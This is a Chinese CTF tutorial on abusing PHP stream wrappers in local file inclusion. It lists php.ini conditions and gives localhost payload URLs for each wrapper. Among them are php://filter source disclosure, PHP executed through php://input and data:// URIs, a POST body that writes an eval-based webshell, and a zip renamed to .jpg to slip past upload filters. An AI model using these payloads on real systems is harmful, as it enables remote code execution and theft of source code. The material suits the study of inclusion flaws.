本篇總結下一些封裝協議,涉及的相關協議:file://、php://filter、php://input、zip://、compress.bzip2://、compress.zlib://、data://等
一.【file://協議】
PHP.ini:
file:// 協議在雙off的情況下也可以正常使用;
allow_url_fopen :off/on
allow_url_include:off/on
file:// 用於訪問本地文件系統,在CTF中通常用來讀取本地文件的且不受allow_url_fopen與allow_url_include的影響
file:// [文件的絕對路徑和文件名]
http://127.0.0.1/cmd.php?file=file://D:/soft/phpStudy/WWW/phpcode.txt
二.【php://協議】
條件:
不需要開啟allow_url_fopen,僅php://input、 php://stdin、 php://memory 和 php://temp 需要開啟allow_url_include。
php:// 訪問各個輸入/輸出流(I/O streams),在CTF中經常使用的是php://filter和php://input,php://filter用於讀取源碼,php://input用於執行php代碼。
參考自:http://php.net/manual/zh/wrappers.php.php#refsect2-wrappers.php-unknown-unknown-unknown-descriptioq
php://filter 讀取源代碼並進行base64編碼輸出,不然會直接當做php代碼執行就看不到源代碼內容了。
PHP.ini:
php://filter在雙off的情況下也可以正常使用;
allow_url_fopen :off/on
allow_url_include:off/on
測試現象:
http://127.0.0.1/cmd.php?file=php://filter/read=convert.base64-encode/resource=./cmd.php
php://input 可以訪問請求的原始數據的只讀流, 將post請求中的數據作為PHP代碼執行。
PHP.ini:
allow_url_fopen :off/on
allow_url_include:on
測試現象:
http://127.0.0.1/cmd.php?file=php://input
[POST DATA] <?php phpinfo()?>
也可以POST如下內容生成一句話: <?php fputs(fopen(“shell.php”,”w”),’<?php eval($_POST["cmd"];?>’);?>
三.【zip://, bzip2://, zlib://協議】
PHP.ini:
zip://, bzip2://, zlib://協議在雙off的情況下也可以正常使用;
allow_url_fopen :off/on
allow_url_include:off/on
zip://, bzip2://, zlib:// 均屬於壓縮流,可以訪問壓縮文件中的子文件,更重要的是不需要指定后綴名。
參考自:http://php.net/manual/zh/wrappers.compression.php
1.【zip://協議】
使用方法:
zip://archive.zip#dir/file.txt
zip:// [壓縮文件絕對路徑]#[壓縮文件內的子文件名]
測試現象:
http://127.0.0.1/cmd.php?file=zip://D:/soft/phpStudy/WWW/file.jpg%23phpcode.txt
先將要執行的PHP代碼寫好文件名為phpcode.txt,將phpcode.txt進行zip壓縮,壓縮文件名為file.zip,如果可以上傳zip文件便直接上傳,若不能便將file.zip重命名為file.jpg后在上傳,其他幾種壓縮格式也可以這樣操作。
由於#在get請求中會將后面的參數忽略所以使用get請求時候應進行url編碼為%23,且此處經過測試相對路徑是不可行,所以只能用絕對路徑。
2.【bzip2://協議】
使用方法:
compress.bzip2://file.bz2
測試現象:
http://127.0.0.1/cmd.php?file=compress.bzip2://D:/soft/phpStudy/WWW/file.jpg
or
http://127.0.0.1/cmd.php?file=compress.bzip2://./file.jpg
3.【zlib://協議】
使用方法:
compress.zlib://file.gz
測試現象:
http://127.0.0.1/cmd.php?file=compress.zlib://D:/soft/phpStudy/WWW/file.jpg
or
http://127.0.0.1/cmd.php?file=compress.zlib://./file.jpg
四.【data://協議】
經過測試官方文檔上存在一處問題,經過測試PHP版本5.2,5.3,5.5,7.0;data:// 協議是是受限於allow_url_fopen的,官方文檔上給出的是NO,所以要使用data://協議需要滿足雙on條件
PHP.ini:
data://協議必須雙在on才能正常使用;
allow_url_fopen :on
allow_url_include:on
參考自:http://php.net/manual/zh/wrappers.data.php, 官方文檔上allow_url_fopen應為yes。
測試現象:
http://127.0.0.1/cmd.php?file=data://text/plain,<?php phpinfo()?>
or
http://127.0.0.1/cmd.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
也可以:
http://127.0.0.1/cmd.php?file=data:text/plain,<?php phpinfo()?>
or
http://127.0.0.1/cmd.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
五. 常規小結:
PHP封裝協議在CTF蠻常見的,是經常會遇到的出題點,如下便是對本篇涉及的封裝協議進行的總結,期待小伙伴的交流和補充。
轉自:https://www.freebuf.com/column/148886.html